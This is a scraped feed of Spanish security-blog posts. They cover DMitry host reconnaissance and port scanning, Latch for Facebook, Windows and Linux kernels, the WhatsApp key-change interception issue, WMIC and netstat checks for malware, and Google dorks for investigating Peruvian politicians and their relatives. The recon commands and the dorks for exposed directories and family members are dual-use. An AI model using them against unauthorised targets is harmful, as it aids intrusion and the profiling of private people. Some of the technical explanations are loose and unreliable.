      do_read_fault <- this is a read fault



Aquí un vídeo mas :)






Saludos!

DMitry : Una herramienta para el Information Gathering

November 6, 2016, 1:52 pm
$
0
0
Dmitry (Deepmagic Information Gathering Tool) es una herramienta en linux codificada exclusivamente en C la cual tiene la capacidad de reunir la mayor cantidad de información posible acerca de un host, tiene muchas opciones a la hora de hacer una consulta, así que me pareció interesante compartirlo, cabe resaltar que esta es una de las muchas herramientas de IG, aquí se las presento :) 




La funcionalidad básica de Dmitry permite capturar información acerca de un host desde una simple búsqueda whois en el objetivo de consolidar dicho escaneo en archivos de texto para su posterior análisis, 



En la imagen anterior pueden ver las posibilidades de búsqueda que podemos hacer en Dmitry, yo haré algunas búsquedas especificas y explicare el resultado, vamos a escanear el dominio de alguna universidad peruana

dmitry -wnseo www.xxxxx.edu.pe

-w Le diremos que haga un Whois lookup a un nombre de dominio
-n Buscara de manera automática resultados en Netcraft.com
-s Buscara subdominios
-e Buscara mails
-o Generará un reporte con el nombre del dominio


Ya saben que tienen registrado un dominio de una universidad publica con un correo en Gmail? Lo bueno es que automáticamente te emite un reporte con toda la información. Se podrian automatizar muchas cosas con DMITRY

También sirve como un escaner de puertos para eso usare :

dmitry -bpo ip

Lo podemos comprobar luego con NMap :)



Search

Protegiendo nuestro Facebook con Latch

November 20, 2016, 5:59 am
$
0
0
Hace ya bastante tiempo hablamos de la aplicación Latch!, una innovación desarrollada en los laboratorios de ElevenPath, el cual dirige Chema Alonso (Hacker y actual CDO de Telefónica), en todo este tiempo esta aplicación a evolucionado muchísimo! Y en esta ocasión les explicaré como podemos aparear nuestra cuenta de Facebook con la aplicación de Latch! para que de esta manera proporcionemos de una capa mas de seguridad a nuestra cuenta


¿Que es Latch?

Pueden leer uno de mis primeros artículos donde hablo sobre "Latch: Un pestillo de seguridad muy interesante"


¿Como funciona Latch?

Aquí un vídeo :)




Para no aburrirlos, vamos al tema ¿Como proteger mi cuenta de Facebook con Latch?


El primer paso es descargar la aplicación Latch! desde GooglePlay o WindowsStore proximamente lo tendrán disponible para IOS, luego tendremos que registrarnos usando una cuenta de correo para ello



El siguiente paso será ir a la configuración de seguridad de nuestra cuenta de Facebook 




Introducimos la contraseña de la cuenta




Escaneamos el código QR desde la aplicación de Latch!



Ya tenemos sincronizado el aplicativo Latch! con nuestra cuenta de Facebook




Con esto la podemos controlar el acceso a nuestra cuenta de Facebook desde Latch, podemos desactivar/activar el inicio de sesión cuando queramos y gracias a la nueva capa de seguridad se nos creara un PIN una clave única de inicio de sesión necesaria para poder ingresar a la cuenta


Les dejo un vídeo para que quede mas claro :)





Saludos!!

Analizando el Kernel : Windows vs Linux

January 20, 2017, 6:40 pm
$
0
0
Hola! Existen grandes diferencias cuando se trata de hablar de las bondades que trae Windows y Linux, algunos usuarios prefieren a uno de ellos a todo nivel , mientras que otros optan por darle usos definidos a cada uno. En este articulo explicare cual es la diferencia entre el Kernel de Windows y el Kernel de Linux





En primer lugar, voy a explicar algunos conceptos para diferenciar como ha dio evolucionando el SO de Windows. En la década de los noventa Microsoft estaba basando sus sistemas operativos en los kernel Windows 9x, donde el código básico tenía muchas similitudes con el famoso MS-DOS. De hecho necesitaba recurrir a él para poder operar. Paralelamente, Microsoft también estaba desarrollando otra versión de su sistema dirigido a los servidores llamada Windows NT, que nació el 26 de julio de 1993.

Ambas versiones de Windows fueron desarrollándose por separado. Windows NT era más bien una jugada a largo plazo, una tecnología que ir desarrollando para los Windows del mañana, y en el año 2000 dieron un nuevo paso en esa dirección. A la versión 5.0 de NT la llamaron Windows 2000, y se convirtió en un interesante participante en el sector empresarial.

Tras ver la buena acogida que tuvo, Microsoft decidió llevar NT al resto de usuarios para que ambas ramificaciones convergieran. Lo hicieron en octubre del 2001 con la versión 5.1 de Windows NT, que llegó al mercado con el nombre de Windows XP, para algunos el primer gran sistema operativo de Microsoft. Por lo tanto, esta versión marcó un antes y un después no sólo por su gran impacto en el mercado, sino porque era el principio de la aventura del Kernel Windows NT, este Kernel marco un hito pues desde ese momento y hasta Windows 10 se ha usado como base este mismo Kernel y se ha ido desarrollando manteniendo la esencia de lo que fue la primera vez






El cuadro anterior me va servir para explicar una de las características del Kernel de Windows, si pueden ver hay 2 capas. La primera es el User Mode (Modo Usuario) y es en esta donde se instalan y ejecutan las aplicaciones con las que interactua el usuario, aunque también se le considera algunos drivers. 

Cuando ejecutas una aplicación, esta accede al modo usuario, donde Windows crea un proceso específico para la aplicación. Cada aplicación tiene su dirección virtual privada, ninguna puede alterar los datos que pertenecen a otra y tampoco acceder al espacio virtual del propio sistema operativo. Es por lo tanto el modo que menos privilegios otorga, incluso el acceso al hardware está limitado, y para pedir los servicios del sistema las aplicaciones tienen que recurrir a la API de Windows.




El modo núcleo en cambio es ese en el que el código que se ejecuta en él tiene acceso directo a todo el hardware y toda la memoria del equipo. Aquí todo el código comparte un mismo espacio virtual, y puede incluso acceder a los espacios de dirección de todos los procesos del modo usuario. Esto es peligroso, ya que si un driver en el modo kernel toca lo que no debe podría afectar al funcionamiento de todo el sistema operativo. Es por esta razón que el código que se encuentra en esta capa es cerrado


Por otro lado, Linux tiene una filosofía completamente distinta, aquí cogieron los principios de modularidad de Unix y decidieron abrir el código y las discusiones técnicas. Gracias a ello, Linux ha creado una comunidad meritocrática de desarrolladores, una en la que todos pueden colaborar y en la que cada cambio que se sugiere se debate con dureza para desechar las peores ideas y quedarse con las mejores. También se halaga a quienes consiguen mejorar las funcionalidades más veteranas. Por esta razon Linux es mas monolitico es decir todo esa en una sola capa 


Los dos están escritos principalmente en C, y son capaces de manejar el almacenamiento en caché, los controladores de dispositivos, la memoria virtual, los sistemas de archivos, los protocolos de red y las llamadas de sistema. Vemos que en esencia sus funcionalidades son las mismas, aunque la manera de llevarlas a cabo es diferente, he aquí principalmente donde radica su diferencia. Ahora que SO te animas a usar? 

Saludos!


Explicando el bug de Whatsapp : Interceptar mensajes y llamadas es posible

January 22, 2017, 3:42 pm
$
0
0
Durante la ultima semana se ha dado a conocer un nuevo "bug" de Whatsapp que permite interceptar las conversaciones y llamadas que llegan desde una terminal a otra. Hace ya un tiempo explique como funciona el nuevo tipo de cifrado de comunicaciones de whatsapp, si aun no lo viste te dejo el enlace aquí en esa publicación explique el nuevo algoritmo de cifrado implantado por la famosa aplicación de mensajera.




Sin embargo, hace unos días se publico una nueva vulnerabilidad que permitía interceptar mensajes de un dispositivo (Y ahora también llamadas y videollamadas) así que en este articulo te explico como funciona.



Un investigador en seguridad ha descubierto la posibilidad de interceptar mensajes y llamadas de un dispositivo que aun no ha recibido el mensaje 


Voy a volver a explicar brevemente como funciona el cifrado que usa Whatsapp. Esta aplicación utiliza el cifrado e2e (End to End) y funciona de la siguiente manera : 



1.- El usuario A envía un mensaje cifrado con una llave publica
2.- El mensaje es alojado en los servidores de whatsapp (Aqui suponemos que ningun empleado de Whatsapp podria desencriptar el mensaje y leerlo) 
3.- El usuario B, quien recibe el mensaje, tiene la llave autorizada (Alojada en el dispositivo) para desencriptar el mensaje y leerlo

Sencillo no?



Ahora que hemos entendido como funciona el cifrado parare a explicar como funciona  el "Bug" de Whatsapp (Si no lo entendiste te dejo un vídeo aqui) :





¿Que ocurre si el dispositivo que recibe el mensaje se encuentra apagado o en modo vuelo? 

Pues como muchos de ustedes saber en el dispositivo remitente aparecerá solamente un check en el mensaje pues esto significa que ha salido de tu teléfono pero solamente esta alojado en los servidores de whatsapp, posteriormente cuando el dispositivo final recibe el mensaje aparece el segundo check y finalmente cuando abre el mensaje aparecen los 2 checks en azul 






Regresando a nuestro tema, cuando el dispositivo destino esta apagado solamente tendremos un check en el mensaje y para desencriptar el mensaje y leer el contenido desde los servidores de Whatsapp necesitaremos la llave privada autorizada alojada en el dispositivo de quien tiene el móvil apagado. Aparentemente no hay mucha ciencia en esto, pero vamos por buen camino para entender este bug. 

El siguiente paso que utilizaría alguien que quiere interceptar ese mensaje seria clonar tu móvil para poder obtener la clave de acceso a tu teléfono y tener la clave privada que le permita desencriptar TODOS los MENSAJES que están alojados y cifrados en los servidores de Whatsapp. La técnica usada por un atacante para este fin puede ser un ataque de tipo Sim Swapping y aunque ustedes no lo crean en Internet hay miles de tutoriales que automatizan este proceso y es muy sencillo



Bueno ya pude clonar la sim de la victima y ahora como funciona? 

Una vez que coloco la sim clonada en un nuevo dispositivo móvil se crea una nueva llave publica en el destinatario y whatsapp detecta esto y automáticamente reenvía los mensajes del dispositivo emisor al dispositivo destinatario (Autorizando su nueva llave)



Utilizare unas diapositivas que encontré para resumir la explicación en simples pasos : 


1.- Whatsapp utiliza encriptacion e2e desde Abril del 2016 (Antes de esto era super mas inseguro)
2.- El protocolo usado es Signal

Ahora lo explico : 





  • Bob envía un mensaje confidencial cifrado a Alicia, ambos se encuentran y ambos verifican el código de seguridad en sus moviles






  • Alicia envía un mensaje a Bob y este se aloja en los servidores de Whatsapp


  • Bob aun no lee el mensaje porque se encuentra fuera de linea o realizando algún viaje, alguien clona el SIM de Bob y el servidor de whatsapp le dice "Tiene una nueva llave publica, reenvía el mensaje"




  • Hecho! El atacante logro interceptar el mensaje!

Aquí les dejo un vídeo que explica este bug , aqui les dejo el enlace al blog donde explica a detalle esta vulnerabilidad



Recomendaciones :

  • No utilizar Whatsapp como medio para enviar mensajes altamente confidenciales como números de tarjetas, claves o información muy personal
  • Hay una opcion de seguridad en facebook que permite notificar cuando las claves publicas cambien, hay que tenerlo activado



Como saber si tu sistema Windows se encuentra infectado

February 19, 2017, 12:19 am
$
0
0
Existen varios métodos para determinar si tu sistema Windows se encuentra infectado por algún malware o si es parte de alguna red zombie infectada, estos métodos no necesitan la instalación de software adicionales ni tampoco garantizan la eliminación de la amenaza, solo te servirán para determinar si tu PC se encuentra comprometida.




Revisar los elementos de inicio/servicios y procesos mediante WMIC : 

WMIC significa windows management instrumentation command-line, es una herramienta de administración para Windows que permite no solo obtener información sino realizar acciones.

Para ver aplicaciones que se ejecutan al inicio bastará con ejecutar el comando 

wmic startup list full



Como podemos ver aquí están todas las aplicaciones que se ejecutan cuando iniciamos el sistema, simplemente debemos identificar alguna ubicada en algún directorio desconocido o no habitual y analizarla 

WMIC es una herramienta muy potente podemos usarla para ver procesos y servicios desconocidos corriendo en nuestro sistema operativo


Procesos : wmic process list full | more
Tambien puedes usar :

wmic process get description,processid,parentprocessid,commandline /format:csv 
Servicios : wmic service list full | more
También puedes usar :
wmic service get name,processid,startmode,state,status,pathname /format:csv 




WMIC y los Jobs : 

Con éste es menos probable encontrar algo porque la mayor parte del malware no utiliza jobs, pero algunos como MPlug lo hacen, y una vez más es bastante fácil de comprobar. Simplemente ejecuta 

wmic job list full

Probablemente recibas una respuesta del tipo 'Instance(s) Available'lo que significa que no hay tareas programadas.


Cache DNS : 

Ahora si escribes

ipconfig /displaydns
Se mostrarán los dominios que se han resuelto recientemente. Si ves algo extraño es recomendable buscar el nombre de dominio y la IP en VirusTotal o similar para determinar si es malicioso.





Netstat : 

Esta herramienta nos permitirá determinar que conexiones de red se están realizando desde nuestra PC, es todo un mundo, pero muy útil a la hora de determinar si somos parte de una botnet

Los parámetros netstat son:

-a Muestra todas las conexiones y puertos a la escucha.
-b Muestra el ejecutable implicado en la creación de cada conexión o puerto de escucha.
-n Muestra las direcciones y los números de puerto en forma numérica.
-o Muestra el ID de proceso propietario asociado a cada conexión.




Existen algunos otros métodos que podemos usar, pero eso lo explicare en una 2° Parte




Cazando corruptos peruanos en la red

February 19, 2017, 6:03 pm
$
0
0
Es conocido por todos los últimos hechos de corrupción que han golpeado al país y que involucran a personajes tan relevantes en su momento que indigna pensar todo lo que pudieron hacer, es también lamentable saber que se han cometido tantos delitos contra la nación como lo es el enriquecimiento ilícito, lavados de activos, trafico de influencias, entre otras mas y que todas atentan contra el desarrollo del país. La corrupción es el nuevo cáncer del Perú y debemos extirparla!




Estamos en una era digital y ahora existen muchas herramientas dentro de Internet que nos sirven para investigar y descubrir evidencias de estos hechos que quizás con el tiempo han quedado perdidos, pero teniendo las Toolsadecuadas podemos descubrirlas, unir hilos y denunciarlas. Por eso en este post presentare algunas técnicas que podemos usar para investigar mucho mas a fondo y así encontrar documentos, publicaciones, artículos, noticias que involucren personajes públicos de nuestra política para así denunciarlos. Cabe mencionar que para las siguientes demostraciones no se uso ningún método que viole la seguridad de ningún servidor, simplemente se usaron técnicas deInformation Gathering para la investigación en la red.


A propósito del ultimo mensaje presidencial de PPK en el minuto 3:00 fomentan la investigación de la corrupción en el país y la denuncia de estas. Así mismo, ofrece un nuevo programa de recompensas lo cual quizás motive a mas peruanos a hacerlo






Bueno, ahora voy a demostrar algunos escenarios ejemplificados en donde podemos usar distintas técnicas que nos servirán para la investigación de estos temas. 


EJEMPLO 1 : 

BUSCANDO DOCUMENTOS PERDIDOS

Antes ya había hablado un poco de las técnicas de GoogleHacking que existen para encontrar información dentro de Internet, sin embargo quisiera dedicar un apartado especial al tratado de documentos.

Voy a usar un Dork simple para descubrir todos los documentos publicados oficiales del estado que involucre la palabra "Alejandro Toledo Manrique" + "Odebrech"

Comenzamos con archivos Word :
site:gob.pe Alejandro Toledo Manrique Odebrecht filetype:doc
Esta Dork lo que hace es buscar dentro de los dominios del estado .gob.pe algún documento MS Word oficial y publicado que contenga ambas palabras clave (La de Alejandro Toledo y la de la empresa Brasileña)





Los primeros resultados ya nos dan indicios de que hay algunas evidencias, vamos a analizar el primer documento. Utilizare la herramienta de Análisis de Metadatos (FOCA) para descubrir un poco mas sobre el archiv




Bueno por lo pronto ya descubrimos que el archivo a salido del Congreso de la Republica, incluso sale el usuario que creo el documento y la fecha (2005) me sorprende que siendo Abril del 2005 utilicen el Windows 2000!!

Voy a extraer solo un fragmento de lo que dice uno de los documentos en Word : 


 Se suponía, creo que va en la misma dirección de lo que dijo el colega Aita. Un proyecto de ley que declare de necesidad pública, de interés nacional, los pueblos y menos el Congreso para seguir declarando obras importantes que cada departamento y cada región tiene para que gobierno que entre pueda ejecutar. Hace bien, señor Presidente, en que la Comisión archive este texto, este dictamen, porque felizmente ya está licitado, está convocado, creo que hay fecha. Más bien le pediríamos que, a través de la Comisión, nos envíen un recuento muy resumido de todo el proceso de licitación porque en el proceso de licitación hay algunas cosas que aparentemente no son transparentemente llevadas; entonces, haríamos bien en que nosotros podamos entrar desde nuestra función fiscalizadora ver que este proceso se lleve a buen fin. Esperemos que se cumplen los plazos que están establecidos ahí y que la Comisión, al término de esta licitación, de darse la buena pro, nos envíe los parámetros de calificación que han tenido las empresas. Esperemos que no sean las mismas que han estado permanentemente ganando las licitaciones, una de ellas Odebrecht y las otras vinculadas, esperemos que sean nuevas. Obviamente, no hay ningún ánimo de querer estar en contra, contra ninguna otra empresa; pero sí que se hagan bien las cosas y que los ganadores sean las poblaciones beneficiadas, en este caso Piura, más aún la tierra del colega Peralta.


Usando ese Dork pueden cambiar por el nombre de la persona que ustedes quieran y el tipo de documento a buscar


EJEMPLO 2 :

NAVEGANDO POR DONDE NO NOS MUESTRAN

Ahora es el turno de las municipalidades, digamos que queremos hacer una búsqueda de la documentación almacenada en servidores web, para ello voy a tomar como muestra la municipalidad de La Molina y voy a buscar en los directorios mas generales para llegar a los especificos.

Usaré el siguiente Dork : 


site:munimolina.gob.pe intilte:Index Of

Lo que hace este dork es buscar dentro de la pagina web de La Molina los directorios publicados con toda la documentación publica, entre ellas se puede encontrar información muy interesante para la investigación y que debe ser de conocimiento publico, muchos documentos alojados aqui no son publicados a través de los enlaces públicos de la web de la municipalidad






Ustedes tienen libertad de leer la documentación publica alojada en estos servidores, usando el Dork anterior simplemente cambien el site por el que ustedes crean conveniente


EJEMPLO 3 :

RELACIONANDO PERSONAS EN LA RED


Vamos a seguir con las municipalidades, en este caso tomaremos de ejemplo a alguna municipalidad y ubicamos a su actual alcalde vamos a realizar un Dork similar al anterior solo que ahora vamos a buscar los apellidos del alcalde en archivos de excel o pdf, pero que no hagan referencia al mismo alcalde, es decir vamos a buscar familiares relacionados a la municipalidad



site:"Introduce web de la municipalidad""Apellido de alcalde" - "Nombre Alcalde" filetype:xls

Con esta búsqueda encontraremos personas que llevan uno o los 2 apellidos del alcalde y que están relacionados de alguna manera a la municipalidad a la cual estamos haciendo la investigación. Vean que utilizo el símbolo - para colocar restricciones a la búsqueda. 



 EJEMPLO 4 :

REVIVIENDO TWEETS BORRADOS POR LOS POLITICOS


Todo el mundo sabe que los políticos están metidos en Twitter las 24h y muchas veces el impulso les gana y twitean algunas posiciones que luego de los consejos de sus asesores y abogados terminan borrando y quedando en el olvido pues existen maneras de revivir esos Tweets elimnados, simplemente visitando el siguiente enlace

https://www.politwoops.com/g/peru







 EJEMPLO 5 :

ALGUNOS MEDIOS DE COMUNICACIÓN CAMBIAN SU OPINIÓN


Varios medios de comunicación a través de su plataforma web publican noticias las cuales luego de un tiempo son alteradas en algunos casos para ser actualizada o en otros para corregir ciertas partes que no les conviene. Para ello existe una poderosa herramienta web llamada WaybackMachine esta herramienta nos permite ver el histórico de las modificaciones hechas a un enlace web el cual ha sido capturado por motores de búsqueda y almacenado en WM 

Para ello ingresamos a la web oficial :

http://archive.org/web/

Y colocamos la URL de la noticia que queremos investigar para saber que cambios le han realizado, en este ejemplo colocare una noticia de la web de La Republica sobre el caso de Alejandro Toledo : 

Link Original : http://larepublica.pe/impresa/politica/845363-odebrecht-pago-us-20-mllns-en-sobornos-para-el-ex-presidente-alejandro-toledo




Según WM se tienen 2 registros almacenados de la noticia, la original es del 4 de Febrero del 2017, fecha en la que se publico la noticia, sin embargo el 5 de Febrero del 2017 hubo una modificación. Nos bastara con comparar el original con el actual para saber cual fue


Noticia original publicada del 4 de Febrero






Noticia del 5 de Febero en donde el único cambio realizado fue agregar la Infografia



Saludos!
Viewing all 40 articles
Browse latest View live
Search